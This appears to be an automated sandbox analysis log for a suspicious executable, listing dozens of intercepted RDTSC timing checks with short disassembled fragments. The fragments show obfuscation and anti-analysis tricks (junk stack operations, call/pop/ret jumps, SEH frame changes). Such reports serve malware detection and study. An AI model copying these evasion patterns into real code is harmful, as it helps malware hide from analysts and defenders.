                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C538F6 second address: C53915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F9C81394BFCh 0x00000011 jne 00007F9C81394BF6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53915 second address: C53951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a movzx ecx, di 0x0000000d lea ebx, dword ptr [ebp+1244F32Eh] 0x00000013 mov dword ptr [ebp+122D2477h], eax 0x00000019 or edx, dword ptr [ebp+122D2848h] 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9C80FB566Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C53951 second address: C53957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72DBF second address: C72DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72DC7 second address: C72DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C72EF1 second address: C72EF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73056 second address: C7306C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F9C81394BF6h 0x00000010 jns 00007F9C81394BF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7306C second address: C73072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C731AE second address: C731B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73494 second address: C7349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7349E second address: C734A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C734A4 second address: C734BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9C80FB5674h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739A9 second address: C739B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739B3 second address: C739B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739B7 second address: C739CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394BFAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F9C81394BFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739CF second address: C739DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007F9C80FB5666h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C739DD second address: C739E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B4E second address: C73B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B54 second address: C73B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B5C second address: C73B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73B61 second address: C73B66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C4C13C second address: C4C170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F9C80FB5676h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C73CA7 second address: C73CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9C81394BFEh 0x00000010 jmp 00007F9C81394BFAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7425E second address: C7427B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F9C80FB5674h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7497A second address: C7498F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A618 second address: C7A61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A61E second address: C7A634 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F9C81394BF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7A5 second address: C7A7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7AA second address: C7A7AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7AF second address: C7A7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F9C80FB566Dh 0x0000000f pop edx 0x00000010 pop edx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F9C80FB566Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7D6 second address: C7A7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A7DA second address: C7A802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C80FB566Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push esi 0x00000010 push edx 0x00000011 jne 00007F9C80FB5666h 0x00000017 pop edx 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A802 second address: C7A806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A8B9 second address: C7A8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7A8BD second address: C7A8CF instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F9C81394BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7EFD7 second address: C7EFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 jc 00007F9C80FB566Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7EFE8 second address: C7F02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C02h 0x00000009 jmp 00007F9C81394C00h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F9C81394BF6h 0x00000016 jmp 00007F9C81394C07h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F02D second address: C7F031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F2FD second address: C7F303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C7F303 second address: C7F307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82FB1 second address: C82FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C82FB5 second address: C82FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C830DD second address: C830E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C830E1 second address: C830FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9C80FB566Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C832FE second address: C83303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8362B second address: C83635 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C83635 second address: C83648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394BFFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C83750 second address: C83754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C84358 second address: C843A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F9C81394BF8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push esi 0x00000028 mov si, dx 0x0000002b pop esi 0x0000002c mov esi, eax 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C868E2 second address: C8693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9C80FB5668h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D1D51h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 pushad 0x0000001a and si, 17D6h 0x0000001f mov ecx, 53D1D7F1h 0x00000024 popad 0x00000025 pop edi 0x00000026 push 00000000h 0x00000028 xor edi, dword ptr [ebp+122D3951h] 0x0000002e xchg eax, ebx 0x0000002f jl 00007F9C80FB5676h 0x00000035 jmp 00007F9C80FB5670h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F9C80FB5673h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8712C second address: C8713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9C81394BF6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88076 second address: C8807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88334 second address: C88352 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F9C81394BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F9C81394BFDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8713E second address: C8715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8807B second address: C88081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C88081 second address: C88085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C898C0 second address: C89902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F9C81394BF8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jmp 00007F9C81394BFDh 0x0000002a push 00000000h 0x0000002c mov si, di 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C89902 second address: C89907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8BDE8 second address: C8BDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8A12C second address: C8A130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C3E7AA second address: C3E7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8C43C second address: C8C440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C90132 second address: C90136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C90136 second address: C9013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F206 second address: C8F20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F20F second address: C8F213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F213 second address: C8F224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F9C81394BF6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91033 second address: C91039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C8F224 second address: C8F284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 ja 00007F9C81394C05h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov ebx, dword ptr [ebp+122D2954h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, dword ptr [ebp+122D267Bh] 0x00000028 movsx ebx, si 0x0000002b mov eax, dword ptr [ebp+122D001Dh] 0x00000031 push FFFFFFFFh 0x00000033 movsx ebx, bx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9C81394C08h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C902DA second address: C902E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91039 second address: C910C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F9C81394BF8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 and edi, dword ptr [ebp+12457C52h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F9C81394BF8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 jmp 00007F9C81394C05h 0x0000004c push edi 0x0000004d add dword ptr [ebp+1244F8B0h], edi 0x00000053 pop ebx 0x00000054 push eax 0x00000055 pushad 0x00000056 jmp 00007F9C81394BFDh 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91FF5 second address: C91FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C91FFA second address: C92001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C912F7 second address: C912FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C92FF8 second address: C93018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394C09h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C92244 second address: C92254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F9C80FB5666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9582E second address: C95838 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C95838 second address: C9584E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB5672h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C958F0 second address: C958F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C958F4 second address: C958FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C97594 second address: C9759B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9759B second address: C97606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F9C80FB5675h 0x0000000d push 00000000h 0x0000000f jns 00007F9C80FB567Eh 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+1244A4D6h], edx 0x0000001d push edi 0x0000001e pushad 0x0000001f and ch, 0000004Eh 0x00000022 jmp 00007F9C80FB5674h 0x00000027 popad 0x00000028 pop edi 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushad 0x0000002c jne 00007F9C80FB5666h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C98674 second address: C98686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C98686 second address: C9868B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9972B second address: C99732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A77F second address: C9A785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A785 second address: C9A789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9A789 second address: C9A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C9C884 second address: C9C89E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394C05h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
